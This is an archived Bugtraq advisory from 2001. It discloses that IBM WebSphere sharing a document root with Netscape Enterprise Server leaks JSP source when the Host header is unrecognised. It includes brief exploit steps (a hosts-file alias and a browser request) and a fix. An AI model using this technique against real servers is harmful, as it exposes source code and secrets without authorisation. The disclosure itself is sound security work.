[18830] in bugtraq
Yet Another IBM WebSphere Showcode Vulerability
daemon@ATHENA.MIT.EDU (mhalls)
Fri Jan 26 13:15:12 2001
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.GSO.4.30.0101251408440.10870-100000@moench.nielsen.net>
Date: Thu, 25 Jan 2001 15:13:33 -0800
Reply-To: mhalls <mhalls@NIELSEN.NET>
From: mhalls <mhalls@NIELSEN.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Summary: When IBM WebSphere application server shares the same document
root as Netscape Enterprise server it is possible for a malicious user to
view to view the source of any JSP file in the document root.
WebSphere's plugin for Netscape Enterprise server uses the host header
sent from the client browser to determine if it should intercept a request
by matching the host header against its list of "host aliases" configured
in WebSphere. By changing the host header to a value that WebSphere
doesn't expect bypasses the plugin allowing the JSP file to be delivered
as a regular file by Netscape Enterprise server.
Exploit: Configure your hosts file to point a random name to the IP
address of the server and then point your browser to
http://randomhostname/somejspfile.jsp. If the randomhostname is not in
WebSphere's list of hosts aliases it will be served as a regular
file.
Solution: Change to document root of WebSphere to point to a different
location than the Netscape Enterprise Server document root and move all
JSP files to the new location. Maybe others?
